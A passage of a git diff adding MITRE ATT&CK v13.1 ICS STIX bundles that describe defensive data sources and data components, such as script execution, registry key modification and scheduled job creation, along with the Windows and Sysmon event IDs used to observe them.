"x-mitre-data-source--1b8c9f31-ad35-4850-bf8c-80c565ad3552", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--9f387817-df83-432a-b56b-a8fb7f71eedd.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--9f387817-df83-432a-b56b-a8fb7f71eedd.json new file mode 100644 index 0000000000000000000000000000000000000000..4feee85354a5e7adf9e1f313420388953561c298 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--9f387817-df83-432a-b56b-a8fb7f71eedd.json @@ -0,0 +1,25 @@ +{ + "type": "bundle", + "id": "bundle--6c9766e6-1ad8-4cfb-a404-b25a6ec5318f", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-07T16:16:55.269Z", + "name": "Script Execution", + "description": "The execution of a text file that contains code via the interpreter (e.g. Powershell, WMI, Windows EID 4104, etc.)", + "x_mitre_data_source_ref": "x-mitre-data-source--12c1e727-7fa4-49b6-af81-366ed2ce231e", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--9f387817-df83-432a-b56b-a8fb7f71eedd", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a.json new file mode 100644 index 0000000000000000000000000000000000000000..d3f18105a9f5df3a99ec5f0475a003bd0cf26e2f --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--fa235724-375c-4866-89c6-2b112520a2c1", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.274Z", + "name": "Network Traffic Flow", + "description": "Summarized network packet data, with metrics, such as protocol headers and volume (ex: Netflow or Zeek http.log)", + "x_mitre_data_source_ref": "x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--a953ca55-921a-44f7-9b8d-3d40141aa17e.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--a953ca55-921a-44f7-9b8d-3d40141aa17e.json new file mode 100644 index 0000000000000000000000000000000000000000..4d9cb84d6c150ebbfcc296105282a4fe0cf4945b --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--a953ca55-921a-44f7-9b8d-3d40141aa17e.json @@ -0,0 +1,25 @@ +{ + "type": "bundle", + "id": "bundle--e8be8763-27b0-40cd-98d5-1f763d1b1794", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-07T16:19:46.282Z", + "name": "User Account Authentication", + "description": "An attempt by a user to gain access to a network or computing resource, often by providing credentials (ex: Windows EID 4776 or /var/log/auth.log)", + "x_mitre_data_source_ref": "x-mitre-data-source--0b4f86ed-f4ab-46a3-8ed1-175be1974da6", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--a953ca55-921a-44f7-9b8d-3d40141aa17e", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--b05a614b-033c-4578-b4f2-c63a9feee706.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--b05a614b-033c-4578-b4f2-c63a9feee706.json new file mode 100644 index 0000000000000000000000000000000000000000..aec5e21ecc0f0f2bc82764825ecb7f5891b4833d --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--b05a614b-033c-4578-b4f2-c63a9feee706.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--b217c357-1ac8-4b29-b763-6849c45c14df", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-21T21:47:58.629Z", + "name": "Asset Inventory", + "description": "This includes sources of current and expected devices on the network, including the manufacturer, model, and necessary identifiers (e.g., IP and hardware addresses)", + "x_mitre_data_source_ref": "x-mitre-data-source--b1717cb4-d536-4e2b-b5e5-07e67e26183c", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--b05a614b-033c-4578-b4f2-c63a9feee706", + "created": "2022-09-23T16:34:00.912Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--b9d031bb-d150-4fc6-8025-688201bf3ffd.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--b9d031bb-d150-4fc6-8025-688201bf3ffd.json new file mode 100644 index 0000000000000000000000000000000000000000..82e6600b3a19ef649f929d26c461c30544ba6b0b --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--b9d031bb-d150-4fc6-8025-688201bf3ffd.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--e69f9550-ccad-46c6-857f-b94113d6505d", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--b9d031bb-d150-4fc6-8025-688201bf3ffd", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.271Z", + "name": "Firmware Modification", + "description": "Changes made to firmware, including its settings and/or data, such as MBR (Master Boot Record) and VBR (Volume Boot Record)", + "x_mitre_data_source_ref": "x-mitre-data-source--ca1cb239-ff6d-4f64-b9d7-41c8556a8b4f", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1.json new file mode 100644 index 0000000000000000000000000000000000000000..10bedc9ea92b4d9a4fd6f849d04913c597dd1086 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--d6cb08d1-80a5-4d57-a890-7dc63bc964a3", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.272Z", + "name": "Module Load", + "description": "Attaching a module into the memory of a process/program, typically to access shared resources/features provided by the module (ex: Sysmon EID 7)", + "x_mitre_data_source_ref": "x-mitre-data-source--f424e4b4-a8a4-4c58-a4ae-4f53bfd08563", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--da85d358-741a-410d-9433-20d6269a6170.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--da85d358-741a-410d-9433-20d6269a6170.json new file mode 100644 index 0000000000000000000000000000000000000000..f2b40fda06f22e03a712c4a55cef7ab2575f47f8 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--da85d358-741a-410d-9433-20d6269a6170.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--4d557e09-1748-4ee2-bfdc-69fdd62de8eb", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--da85d358-741a-410d-9433-20d6269a6170", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Windows Registry Key Modification", + "description": "Changes made to a Registry Key and/or Key value (ex: Windows EID 4657 or Sysmon EID 13|14)", + "x_mitre_data_source_ref": "x-mitre-data-source--0f42a24c-e035-4f93-a91c-5f7076bd8da0", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--e905dad2-00d6-477c-97e8-800427abd0e8.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--e905dad2-00d6-477c-97e8-800427abd0e8.json new file mode 100644 index 0000000000000000000000000000000000000000..9822195b0591369d0ea34513d2bb34b8fa102eea --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--e905dad2-00d6-477c-97e8-800427abd0e8.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--e6916262-5bf8-4553-9875-5efefa565d4c", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--e905dad2-00d6-477c-97e8-800427abd0e8", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2022-03-30T14:26:51.805Z", + "name": "File Deletion", + "description": "Removal of a file (ex: Sysmon EID 23, macOS ESF EID ES_EVENT_TYPE_AUTH_UNLINK, or Linux commands auditd unlink, rename, rmdir, unlinked, or renameat rules)", + "x_mitre_data_source_ref": "x-mitre-data-source--509ed41e-ca42-461e-9058-24602256daf9", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--ee575f4a-2d4f-48f6-b18b-89067760adc1.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--ee575f4a-2d4f-48f6-b18b-89067760adc1.json new file mode 100644 index 0000000000000000000000000000000000000000..232ebed7f66595f2392174503502de5634b3f815 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--ee575f4a-2d4f-48f6-b18b-89067760adc1.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--8ba7cfa7-6826-4b63-82d4-a5a082608cd2", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--ee575f4a-2d4f-48f6-b18b-89067760adc1", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.272Z", + "name": "Process Metadata", + "description": "Contextual data about a running process, which may include information such as environment variables, image name, user/owner, etc.", + "x_mitre_data_source_ref": "x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--f42df6f0-6395-4f0c-9376-525a031f00c3.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--f42df6f0-6395-4f0c-9376-525a031f00c3.json new file mode 100644 index 0000000000000000000000000000000000000000..2ba2ab15b1374357abb7d79138a614156283f15b --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--f42df6f0-6395-4f0c-9376-525a031f00c3.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--ec8b6382-252c-4f75-9dbc-0969c4b851cd", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--f42df6f0-6395-4f0c-9376-525a031f00c3", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.271Z", + "name": "Scheduled Job Creation", + "description": "Initial construction of a new scheduled job (ex: Windows EID 4698 or /var/log cron logs)", + "x_mitre_data_source_ref": "x-mitre-data-source--c9ddfb51-eb45-4e22-b614-44ac1caa7883", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--f5468e67-51c7-4756-9b4f-65707708e7fa.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--f5468e67-51c7-4756-9b4f-65707708e7fa.json new file mode 100644 index 0000000000000000000000000000000000000000..95d7475244f7b07e92c2bb5011e0581dfdd5e448 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--f5468e67-51c7-4756-9b4f-65707708e7fa.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--cdcef489-bdad-49d7-98bb-dcfb8019b344", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--f5468e67-51c7-4756-9b4f-65707708e7fa", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.275Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.275Z", + "name": "Network Share Access", + "description": "Opening a network share, which makes the contents available to the requestor (ex: Windows EID 5140 or 5145)", + "x_mitre_data_source_ref": "x-mitre-data-source--ba27545a-9c32-47ea-ba6a-cce50f1b326e", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--faa34cf6-cf32-4dc9-bd6a-8f7a606ff65b.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--faa34cf6-cf32-4dc9-bd6a-8f7a606ff65b.json new file mode 100644 index 0000000000000000000000000000000000000000..718883838566f5c44aeae5edd263716e29a10ba3 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--faa34cf6-cf32-4dc9-bd6a-8f7a606ff65b.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--a6862587-b2d5-4a5f-b787-4f2b460fbc08", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--faa34cf6-cf32-4dc9-bd6a-8f7a606ff65b", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.271Z", + "name": "Scheduled Job Modification", + "description": "Changes made to a scheduled job, such as modifications to the execution launch (ex: Windows EID 4702 or /var/log cron logs)", + "x_mitre_data_source_ref": "x-mitre-data-source--c9ddfb51-eb45-4e22-b614-44ac1caa7883", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--0b4f86ed-f4ab-46a3-8ed1-175be1974da6.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--0b4f86ed-f4ab-46a3-8ed1-175be1974da6.json new file mode 100644 index 0000000000000000000000000000000000000000..efacd6350f2b632a991233e7496af5432c39fcbc --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--0b4f86ed-f4ab-46a3-8ed1-175be1974da6.json @@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--13fece6d-e3b4-4467-af6f-11db18f5308d", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-12-07T19:50:43.993Z", + "name": "User Account", + "description": "A profile representing a user, device, service, or application used to authenticate and access resources", + "x_mitre_platforms": [ + "Azure AD", + "Containers", + "Google Workspace", + "IaaS", + "Linux", + "Office 365", + "SaaS", + "Windows", + "macOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane", + "Container", + "Host" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--0b4f86ed-f4ab-46a3-8ed1-175be1974da6", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0002", + "external_id": "DS0002" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--0f42a24c-e035-4f93-a91c-5f7076bd8da0.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--0f42a24c-e035-4f93-a91c-5f7076bd8da0.json new file mode 100644 index 0000000000000000000000000000000000000000..c2a5bebc0d97bdce8bc183fbf6480017d9db44f4 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--0f42a24c-e035-4f93-a91c-5f7076bd8da0.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--5e486f5f-2ecf-4b99-8eea-e85323751459", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--0f42a24c-e035-4f93-a91c-5f7076bd8da0", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0024", + "external_id": "DS0024" + }, + { + "source_name": "Microsoft Registry", + "description": "Microsoft. (2018, May 31). Registry. Retrieved September 29, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + } + ], + "modified": "2022-05-11T14:00:00.188Z", + "name": "Windows Registry", + "description": "A Windows OS hierarchical database that stores much of the information and settings for software programs, hardware devices, user preferences, and operating-system configurations(Citation: Microsoft Registry)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--12c1e727-7fa4-49b6-af81-366ed2ce231e.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--12c1e727-7fa4-49b6-af81-366ed2ce231e.json new file mode 100644 index 0000000000000000000000000000000000000000..0811d7c1b72ed22afbc215d1b5e16515da41ec40 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--12c1e727-7fa4-49b6-af81-366ed2ce231e.json @@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--965ec4a7-fedc-43b2-8819-a6b84f3aa5d2", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-12-07T19:50:56.964Z", + "name": "Script", + "description": "A file or stream containing a list of commands, allowing them to be launched in sequence(Citation: Microsoft PowerShell Logging)(Citation: FireEye PowerShell Logging)(Citation: Microsoft AMSI)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--12c1e727-7fa4-49b6-af81-366ed2ce231e", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0012", + "external_id": "DS0012" + }, + { + "source_name": "FireEye PowerShell Logging", + "description": "Dunwoody, M. (2016, February 11). Greater Visibility Through PowerShell Logging. Retrieved September 28, 2021.", + "url": "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html" + }, + { + "source_name": "Microsoft AMSI", + "description": "Microsoft. (2019, April 19). Antimalware Scan Interface (AMSI). Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal" + }, + { + "source_name": "Microsoft PowerShell Logging", + "description": "Microsoft. (2020, March 30). about_Logging_Windows. Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--1b8c9f31-ad35-4850-bf8c-80c565ad3552.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--1b8c9f31-ad35-4850-bf8c-80c565ad3552.json new file mode 100644 index 0000000000000000000000000000000000000000..60b2b7913af52acb0b22f4549753fc05feef3794 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--1b8c9f31-ad35-4850-bf8c-80c565ad3552.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--7031653e-4ffd-4627-88a4-398dc885b3aa", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-24T19:14:55.615Z", + "name": "Operational Databases", + "description": "Operational databases contain information about the status of the operational process and associated devices, including any measurements, events, history, or alarms that have occurred", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_collection_layers": [ + "Host" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--1b8c9f31-ad35-4850-bf8c-80c565ad3552", + "created": "2022-05-11T16:22:58.802Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0040", + "external_id": "DS0040" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--40269753-26bd-437b-986e-159c66dec5e4.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--40269753-26bd-437b-986e-159c66dec5e4.json new file mode 100644 index 0000000000000000000000000000000000000000..1281318398c1ddc9133950f52375493ac4e6efa2 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--40269753-26bd-437b-986e-159c66dec5e4.json @@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--a0bf7bb6-4c80-44f6-ab65-088d62ba6fd2", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Google Workspace", + "IaaS", + "Linux", + "Office 365", + "SaaS", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane", + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--40269753-26bd-437b-986e-159c66dec5e4", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0015", + "external_id": "DS0015" + }, + { + "source_name": "Confluence Logs", + "description": "Confluence Support. (2021, April 22). Working with Confluence Logs. Retrieved September 23, 2021.", + "url": "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + } + ], + "modified": "2022-05-11T14:00:00.188Z", + "name": "Application Log", + "description": "Events collected by third-party services such as mail servers, web applications, or other appliances (not by the native OS or platform)(Citation: Confluence Logs)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--4358c631-e253-4557-86df-f687d0ef9891.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--4358c631-e253-4557-86df-f687d0ef9891.json new file mode 100644 index 0000000000000000000000000000000000000000..9ad8955c0b841758f535fc43491a7da4e9d88c3a --- /dev/null +++ 